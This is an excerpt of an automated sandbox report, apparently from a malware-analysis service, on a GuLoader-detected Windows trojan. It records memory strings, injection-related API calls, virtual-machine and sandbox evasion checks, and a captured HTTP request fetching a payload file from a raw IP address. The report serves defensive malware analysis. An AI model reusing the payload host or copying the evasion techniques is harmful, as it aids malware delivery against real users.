                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: GR8jRQeRUr.exeString found in binary or memory: https://www.digicert.com/CPS0
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: global trafficHTTP traffic detected: GET /RamzersStubed.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8Cache-Control: no-cache
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
                        Source: GR8jRQeRUr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040755C
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00406D85
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_72E41BFF
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294663A
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947BC0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294AF3F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294708D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029402A2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02946CE3
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02949414
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947219
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294700B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294607E
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02946A7B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029479D2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029479C2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029471F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029469EB
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947154
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294A152
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294637F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02949F6F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000644F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000609C0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00064A30
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00062A48
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00065BA0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00069E50
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0006E5C9
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00064D60
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A612F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A6B00
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000AED60
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A7170
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A97F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A9808
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00105C58
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00107FB8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0010B01F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294663A NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294AA46 LoadLibraryA,NtProtectVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947BC0 NtAllocateVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294708D NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029402A2 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02946CE3 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947219 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294700B NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294723B NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294607E NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02946A7B NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029471F8 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029469EB NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947154 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294637F NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess Stats: CPU usage > 98%
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmpBinary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exeStatic PE information: invalid certificate
                        Source: GR8jRQeRUr.exeVirustotal: Detection: 13%
                        Source: GR8jRQeRUr.exeReversingLabs: Detection: 15%
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile read: C:\Users\user\Desktop\GR8jRQeRUr.exeJump to behavior
                        Source: GR8jRQeRUr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile created: C:\Users\user\AppData\Local\Temp\nstAA59.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@0/2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_004021AA CoCreateInstance,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: GR8jRQeRUr.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp

                        Data Obfuscation:

                        barindex
                        Yara detected GuLoaderShow sources
                        Source: Yara matchFile source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000000.404230350.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_72E430C0 push eax; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02944E91 push ss; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029438A6 push cs; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02945C10 push ds; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294080B push cs; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294027C push ds; iretw
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02940263 push ds; iretw
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029407F2 push cs; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029423EE push ebx; retf
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0006B530 push esp; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000AD4D0 push cs; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000AF950 push eax; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0010099C push 418B000Dh; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0012A721 push ds; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_72E41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile created: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dllJump to dropped file
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect Any.runShow sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Program Files\qga\qga.exe
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Program Files\qga\qga.exe
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe TID: 6424Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe TID: 3176Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWindow / User API: threadDelayed 527
